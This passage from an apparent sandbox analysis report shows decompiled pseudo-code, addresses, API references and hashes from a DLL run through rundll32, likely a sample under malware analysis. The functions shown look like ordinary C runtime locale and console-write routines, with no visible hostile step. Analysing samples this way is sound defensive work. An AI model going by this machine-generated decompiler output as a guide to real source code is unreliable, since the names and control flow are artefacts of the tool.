													_t431 = _v464;
													_t450 = _t269;
													_pop(_t383);
													__eflags = _t450;
													if(_t450 != 0) {
														L49:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t270 = _v452;
															goto L55;
														} else {
															_push(_t450);
															_t272 = E6E25D5B2(_t383,  &_v276, 0x83, _t362);
															_t478 = _t475 + 0x10;
															__eflags = _t272;
															if(_t272 != 0) {
																L83:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E6E242188();
																asm("int3");
																_push(_t466);
																_t468 = _t478;
																_t275 =  *0x6e2c506c; // 0x2b33ced3
																_v556 = _t275 ^ _t468;
																_push(_t362);
																_t367 = _v540;
																_push(_t450);
																_push(_t431);
																_t435 = _v544;
																_v1292 = _t367;
																_v1276 = E6E24D5FF(_t367, _t383, _t425) + 0x278;
																_t282 = E6E24DE92(_t367, _t425, _t435, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55,  &_v1256);
																_t480 = _t478 - 0x2e4 + 0x18;
																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6E24F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6E2491A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6E242188();
																					asm("int3");
																					_t295 =  *0x6e2c76f0; // 0x7247a8
																					 *0x6e2c5108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6e2c51c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6e2c51ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6E24DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6E256102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6e270ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6E221C3C( &_v536,  *0x6e2c51e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6e270de8; // 0x6e20815c
																					 *0x6e26a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6e2c52b0;
																						if(_t401 != 0x6e2c52b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6E24CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6E24CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6E24CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6E21F8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6E2203A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6E21F8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6e24e506
0x6e24e509
0x6e24e50b
0x6e24e50e
0x6e24e50f
0x6e24e518
0x6e24e520
0x6e24e522
0x6e24e524
0x6e24e527
0x6e24e640
0x6e24e645
0x6e24e52d
0x6e24e52d
0x6e24e52e
0x6e24e52e
0x6e24e531
0x6e24e534
0x6e24e536
0x6e24e539
0x6e24e539
0x6e24e53c
0x6e24e53e
0x6e24e541
0x6e24e546
0x6e24e554
0x6e24e55e
0x6e24e561
0x6e24e564
0x6e24e564
0x6e24e56f
0x6e24e574
0x6e24e579
0x00000000
0x6e24e57f
0x6e24e582
0x6e24e582
0x6e24e585
0x6e24e587
0x6e24e58a
0x6e24e58a
0x6e24e58a
0x6e24e58c
0x6e24e58c
0x6e24e58c
0x6e24e592
0x00000000
0x00000000
0x6e24e597
0x6e24e5ae
0x6e24e5ae
0x6e24e599
0x6e24e599
0x6e24e5a1
0x00000000
0x6e24e5a3
0x6e24e5a3
0x6e24e5a6
0x6e24e5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24e5ac
0x6e24e5a1
0x6e24e5b7
0x6e24e5bc
0x6e24e5be
0x6e24e5c3
0x6e24e5c6
0x6e24e5c9
0x6e24e5cc
0x6e24e5cf
0x6e24e5d1
0x6e24e5d6
0x6e24e5e0
0x6e24e5e8
0x6e24e5f0
0x00000000
0x6e24e5f6
0x6e24e5fa
0x6e24e647
0x6e24e64d
0x6e24e650
0x6e24e653
0x6e24e655
0x6e24e659
0x6e24e65d
0x6e24e65f
0x6e24e662
0x6e24e667
0x6e24e65d
0x6e24e668
0x6e24e66b
0x6e24e66d
0x6e24e66f
0x6e24e673
0x6e24e674
0x6e24e676
0x6e24e679
0x6e24e67e
0x6e24e674
0x6e24e681
0x6e24e684
0x6e24e687
0x6e24e68a
0x6e24e68d
0x6e24e68d
0x6e24e5fc
0x6e24e5fc
0x6e24e5ff
0x6e24e602
0x6e24e604
0x6e24e608
0x6e24e60c
0x6e24e60e
0x6e24e611
0x6e24e616
0x6e24e60c
0x6e24e617
0x6e24e61c
0x6e24e61e
0x6e24e623
0x6e24e625
0x6e24e628
0x6e24e62d
0x6e24e623
0x6e24e62e
0x6e24e632
0x6e24e632
0x6e24e635
0x6e24e639
0x6e24e63c
0x6e24e63c
0x00000000
0x6e24e63f
0x00000000
0x6e24e5f0
0x6e24e5b2
0x6e24e5b4
0x6e24e5b4
0x00000000
0x6e24e5b4
0x6e24e694
0x6e24e695
0x6e24e696
0x6e24e697
0x6e24e698
0x6e24e699
0x6e24e69e
0x6e24e6a1
0x6e24e6a2
0x6e24e6a4
0x6e24e6aa
0x6e24e6b1
0x6e24e6b4
0x6e24e6b7
0x6e24e6b8
0x6e24e6b9
0x6e24e6bc
0x6e24e6bd
0x6e24e6c0
0x6e24e6c6
0x6e24e6c8
0x6e24e6ed
0x6e24e6f7
0x6e24e6fd
0x6e24e6ff
0x6e24e705
0x6e24e707
0x6e24e95a
0x6e24e95b
0x00000000
0x6e24e70d
0x6e24e70d
0x6e24e711
0x6e24e878
0x6e24e88f
0x6e24e894
0x6e24e897
0x6e24e899
0x6e24e89f
0x6e24e89f
0x6e24e8a1
0x6e24e8a1
0x6e24e8a4
0x6e24e8a6
0x6e24e8ac
0x6e24e8ac
0x6e24e8ae
0x6e24e935
0x6e24e935
0x6e24e8b4
0x6e24e8b4
0x6e24e8b6
0x6e24e8bc
0x6e24e8bf
0x6e24e8c2
0x6e24e8c8
0x00000000
0x00000000
0x6e24e8ca
0x6e24e8ce
0x6e24e8f7
0x6e24e8f7
0x6e24e8f9
0x6e24e8d0
0x6e24e8d0
0x6e24e8d4
0x6e24e8d8
0x6e24e8df
0x6e24e8e5
0x00000000
0x6e24e8e7
0x6e24e8e7
0x6e24e8ea
0x6e24e8ed
0x6e24e8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24e8f5
0x6e24e8e5
0x6e24e904
0x6e24e904
0x6e24e906
0x6e24e934
0x6e24e934
0x00000000
0x6e24e908
0x6e24e908
0x6e24e90e
0x6e24e90f
0x6e24e910
0x6e24e911
0x6e24e916
0x6e24e91c
0x6e24e91f
0x6e24e921
0x6e24e928
0x6e24e92a
0x6e24e92c
0x6e24e923
0x6e24e923
0x6e24e924
0x00000000
0x6e24e924
0x6e24e921
0x00000000
0x6e24e906
0x6e24e8fd
0x6e24e8ff
0x6e24e902
0x6e24e902
0x00000000
0x6e24e902
0x6e24e93b
0x6e24e93b
0x6e24e93c
0x6e24e93f
0x6e24e945
0x6e24e945
0x6e24e94e
0x6e24e950
0x00000000
0x6e24e952
0x6e24e952
0x00000000
0x6e24e952
0x6e24e950
0x00000000
0x6e24e717
0x6e24e717
0x6e24e71c
0x00000000
0x6e24e722
0x6e24e722
0x6e24e727
0x00000000
0x6e24e72d
0x6e24e72d
0x6e24e733
0x6e24e738
0x6e24e73a
0x6e24e741
0x6e24e742
0x6e24e744
0x00000000
0x00000000
0x6e24e74a
0x6e24e74a
0x6e24e74e
0x6e24e754
0x00000000
0x6e24e75a
0x6e24e75c
0x6e24e75d
0x6e24e760
0x00000000
0x6e24e766
0x6e24e766
0x6e24e76c
0x6e24e771
0x6e24e77b
0x6e24e77f
0x6e24e784
0x6e24e787
0x6e24e789
0x00000000
0x6e24e78b
0x6e24e78b
0x6e24e78d
0x6e24e790
0x6e24e790
0x6e24e793
0x6e24e796
0x6e24e796
0x6e24e7a1
0x6e24e7a3
0x6e24e7a5
0x00000000
0x00000000
0x6e24e7a5
0x00000000
0x6e24e7a7
0x6e24e7a7
0x6e24e7ad
0x6e24e7b0
0x6e24e7b0
0x6e24e7be
0x6e24e7c7
0x6e24e7cc
0x6e24e7d2
0x6e24e7d5
0x6e24e7d6
0x6e24e7d8
0x6e24e7e6
0x6e24e7e6
0x6e24e7ed
0x6e24e84e
0x00000000
0x6e24e7ef
0x6e24e7ef
0x6e24e7fd
0x6e24e802
0x6e24e805
0x6e24e807
0x6e24e977
0x6e24e979
0x6e24e97a
0x6e24e97b
0x6e24e97c
0x6e24e97d
0x6e24e97e
0x6e24e983
0x6e24e986
0x6e24e987
0x6e24e98f
0x6e24e996
0x6e24e999
0x6e24e99a
0x6e24e99d
0x6e24e9a1
0x6e24e9a2
0x6e24e9a5
0x6e24e9b5
0x6e24e9d8
0x6e24e9dd
0x6e24e9e0
0x6e24e9e2
0x6e24e9f7
0x6e24e9fa
0x6e24e9fa
0x6e24e9fd
0x6e24ea03
0x6e24ea09
0x6e24ea0c
0x6e24ea0e
0x6e24ea11
0x6e24ea18
0x6e24ea1b
0x6e24ea21
0x00000000
0x00000000
0x6e24ea23
0x6e24ea27
0x6e24ea50
0x6e24ea50
0x6e24ea29
0x6e24ea29
0x6e24ea2d
0x6e24ea31
0x6e24ea38
0x6e24ea3e
0x00000000
0x6e24ea40
0x6e24ea40
0x6e24ea43
0x6e24ea46
0x6e24ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24ea4e
0x6e24ea3e
0x6e24ea5d
0x6e24ea5d
0x6e24ea5f
0x6e24ea65
0x6e24ea6b
0x6e24ea6e
0x6e24ea6e
0x6e24ea71
0x6e24ea74
0x6e24ea74
0x6e24ea84
0x6e24ea92
0x6e24ea97
0x6e24ea9e
0x6e24eaa0
0x00000000
0x6e24eaa6
0x6e24eaac
0x6e24eab2
0x6e24eab9
0x6e24eabf
0x6e24eac2
0x6e24eac8
0x6e24ead5
0x6e24eadc
0x6e24eae1
0x6e24eae4
0x6e24eae6
0x6e24ed3f
0x6e24ed45
0x6e24ed46
0x6e24ed47
0x6e24ed48
0x6e24ed49
0x6e24ed4a
0x6e24ed4f
0x6e24ed50
0x6e24ed5b
0x6e24ed63
0x6e24ed69
0x6e24ed6c
0x6e24ed71
0x6e24eaec
0x6e24eaec
0x6e24eafa
0x6e24eafd
0x6e24eb18
0x6e24eb1f
0x6e24eb25
0x6e24eb2b
0x6e24eaff
0x6e24eaff
0x6e24eb07
0x00000000
0x6e24eb09
0x6e24eb09
0x6e24eb0f
0x6e24eb0f
0x6e24eb07
0x6e24eb32
0x6e24eb35
0x6e24ec52
0x6e24ec55
0x6e24ec62
0x6e24ec65
0x6e24ec6d
0x6e24ec6d
0x6e24ec57
0x6e24ec5d
0x6e24ec5d
0x6e24eb3b
0x6e24eb3b
0x6e24eb41
0x6e24eb49
0x6e24eb4b
0x6e24eb4e
0x6e24eb57
0x6e24eb60
0x6e24eb66
0x6e24eb66
0x6e24eb69
0x6e24eb6b
0x00000000
0x00000000
0x6e24eb6d
0x6e24eb73
0x6e24eb74
0x6e24eb7f
0x6e24eb87
0x6e24eb8f
0x6e24eb92
0x6e24eb95
0x6e24eb9b
0x6e24eba1
0x6e24eba7
0x6e24ebad
0x6e24ebb0
0x00000000
0x00000000
0x6e24ebb2
0x6e24ebd7
0x6e24ebd7
0x6e24ebda
0x6e24ebde
0x6e24ebf7
0x6e24ebfc
0x6e24ebff
0x6e24ec01
0x6e24ec07
0x6e24ec42
0x6e24ec09
0x6e24ec09
0x6e24ec0e
0x6e24ec16
0x6e24ec17
0x6e24ec17
0x6e24ec2e
0x6e24ec35
0x6e24ec38
0x6e24ec3d
0x6e24ec3d
0x6e24ec45
0x6e24ec48
0x6e24ec48
0x6e24ec4d
0x00000000
0x6e24ec4d
0x6e24ebb4
0x6e24ebb6
0x6e24ebbb
0x6e24ebc1
0x6e24ebca
0x6e24ebd3
0x6e24ebd3
0x00000000
0x6e24ebb6
0x6e24ec70
0x6e24ec70
0x6e24ec74
0x6e24ec7c
0x6e24ec82
0x6e24ec85
0x6e24ec8b
0x6e24ec8d
0x6e24eccd
0x6e24ecd3
0x6e24ecda
0x6e24ecda
0x6e24ece0
0x6e24ece4
0x00000000
0x6e24ece6
0x6e24ece6
0x6e24ecea
0x6e24ecef
0x6e24ecf3
0x6e24ecf8
0x6e24ecff
0x6e24ed0d
0x6e24ed13
0x6e24ed16
0x6e24ed16
0x6e24ece4
0x6e24ed25
0x6e24ed2d
0x6e24ed36
0x6e24ec8f
0x6e24ec95
0x6e24ec98
0x6e24ec9f
0x6e24ecb1
0x6e24ecb8
0x6e24ecc5
0x00000000
0x6e24ecc5
0x00000000
0x6e24ec8d
0x6e24eae6
0x6e24ea61
0x00000000
0x6e24ea61
0x00000000
0x6e24ea5f
0x6e24ea58
0x6e24ea5a
0x6e24ea5a
0x00000000
0x6e24e9e4
0x6e24e9e4
0x6e24e9e4
0x6e24e9e6
0x6e24e9ea
0x6e24e9eb
0x6e24e9f6
0x6e24e9f6
0x6e24e80d
0x6e24e80d
0x6e24e810
0x6e24e815
0x6e24e972
0x00000000
0x6e24e81b
0x6e24e81d
0x6e24e825
0x6e24e82b
0x6e24e82c
0x6e24e832
0x6e24e833
0x6e24e838
0x6e24e83b
0x6e24e83d
0x6e24e843
0x6e24e845
0x6e24e846
0x6e24e846
0x6e24e854
0x6e24e854
0x6e24e857
0x6e24e859
0x6e24e85c
0x6e24e86a
0x6e24e86a
0x6e24e954
0x6e24e954
0x00000000
0x6e24e956
0x6e24e956
0x00000000
0x6e24e85e
0x6e24e85e
0x6e24e861
0x6e24e864
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24e864
0x6e24e85c
0x6e24e815
0x6e24e807
0x6e24e7da
0x6e24e7dc
0x6e24e7dd
0x6e24e7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24e7e0
0x6e24e7d8
0x6e24e760
0x00000000
0x6e24e754
0x00000000
0x6e24e871
0x6e24e727
0x6e24e71c
0x6e24e711
0x6e24e6ca
0x6e24e6ca
0x6e24e6cc
0x6e24e6ce
0x6e24e6cf
0x6e24e6d0
0x6e24e6d1
0x6e24e6d6
0x6e24e961
0x6e24e965
0x6e24e966
0x6e24e971
0x6e24e971
0x6e24e6c8
0x00000000

APIs

Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F

_free.LIBCMT ref: 6E24E611
_free.LIBCMT ref: 6E24E628
_free.LIBCMT ref: 6E24E647
_free.LIBCMT ref: 6E24E662
_free.LIBCMT ref: 6E24E679

Strings

'n, xrefs: 6E24E559

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: 'n
API String ID: 3033488037-1397255199
Opcode ID: 82d5b5f4c441dc15834a44e6df7a5b7f65ab9c18cd46241f1132c49318378c0f
Instruction ID: 0a893c57c1a0448593334c79b178121568037943c929681ed19f1f765fe0ec54
Opcode Fuzzy Hash: 82d5b5f4c441dc15834a44e6df7a5b7f65ab9c18cd46241f1132c49318378c0f
Instruction Fuzzy Hash: 5951D475A1030DEFEB59CFA9C841AAAB3FAEF45725F100569E809DF250EB35E900CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E252C2B, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E252C2B(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __esi;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t92;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				signed int _t129;
				signed char* _t131;
				intOrPtr* _t132;
				signed int _t133;
				void* _t134;

				_t78 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t78 ^ _t133;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t131 = _a12;
				_v52 = _t131;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6e2c76f8 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t131;
				_t86 = GetConsoleCP();
				_t132 = _a4;
				_v60 = _t86;
				 *_t132 = 0;
				 *((intOrPtr*)(_t132 + 4)) = 0;
				 *((intOrPtr*)(_t132 + 8)) = 0;
				while(_t131 < _v40) {
					_v28 = 0;
					_v31 =  *_t131;
					_t129 =  *(0x6e2c76f8 + _v48 * 4);
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						_t92 = E6E24367B(_t116, _t129);
						_t129 = 0x8000;
						if(( *(_t92 + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t131);
							goto L8;
						} else {
							if(_t131 >= _v40) {
								_t129 = _v48;
								 *((char*)( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2e)) =  *_t131;
								 *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6e2c76f8 + _t129 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
							} else {
								_t112 = E6E24CF1B( &_v28, _t131, 2);
								_t134 = _t134 + 0xc;
								if(_t112 != 0xffffffff) {
									_t131 =  &(_t131[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6E24CF1B();
						_t134 = _t134 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t131 =  &(_t131[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t132 = GetLastError();
								} else {
									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6E21F8A5(_v8 ^ _t133, _t129, _t132);
			}

0x6e252c33
0x6e252c3a
0x6e252c3d
0x6e252c45
0x6e252c49
0x6e252c55
0x6e252c58
0x6e252c5b
0x6e252c62
0x6e252c6a
0x6e252c6d
0x6e252c73
0x6e252c79
0x6e252c7e
0x6e252c80
0x6e252c83
0x6e252c88
0x6e252c92
0x6e252c99
0x6e252c9c
0x6e252ca3
0x6e252caa
0x6e252cc5
0x6e252ccd
0x6e252cd6
0x6e252cfc
0x6e252cfe
0x00000000
0x6e252cd8
0x6e252cdb
0x6e252da2
0x6e252dae
0x6e252db9
0x6e252dbe
0x6e252ce1
0x6e252ce8
0x6e252ced
0x6e252cf3
0x6e252cf9
0x00000000
0x6e252cf9
0x6e252cf3
0x6e252cdb
0x6e252cac
0x6e252cb0
0x6e252cb3
0x6e252cb9
0x6e252cbb
0x6e252cbe
0x6e252cc2
0x6e252cff
0x6e252d02
0x6e252d03
0x6e252d08
0x6e252d0e
0x6e252d14
0x6e252d23
0x6e252d29
0x6e252d2f
0x6e252d34
0x6e252d50
0x6e252dc3
0x6e252dc9
0x6e252d52
0x6e252d5a
0x6e252d63
0x6e252d69
0x00000000
0x6e252d6b
0x6e252d6d
0x6e252d70
0x6e252d89
0x00000000
0x6e252d8b
0x6e252d8f
0x6e252d91
0x6e252d94
0x00000000
0x6e252d94
0x6e252d8f
0x6e252d89
0x6e252d69
0x6e252d63
0x6e252d50
0x6e252d34
0x6e252d0e
0x00000000
0x6e252d97
0x6e252d97
0x6e252dcb
0x6e252ddd

APIs

GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,6E2533A0,?,?,00000000,?,?,?), ref: 6E252C6D
__fassign.LIBCMT ref: 6E252CE8
__fassign.LIBCMT ref: 6E252D03
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E252D29
WriteFile.KERNEL32(?,00000000,00000000,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D48
WriteFile.KERNEL32(?,?,00000001,6E2533A0,00000000,?,?,?,?,?,?,?,?,?,6E2533A0,?), ref: 6E252D81

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

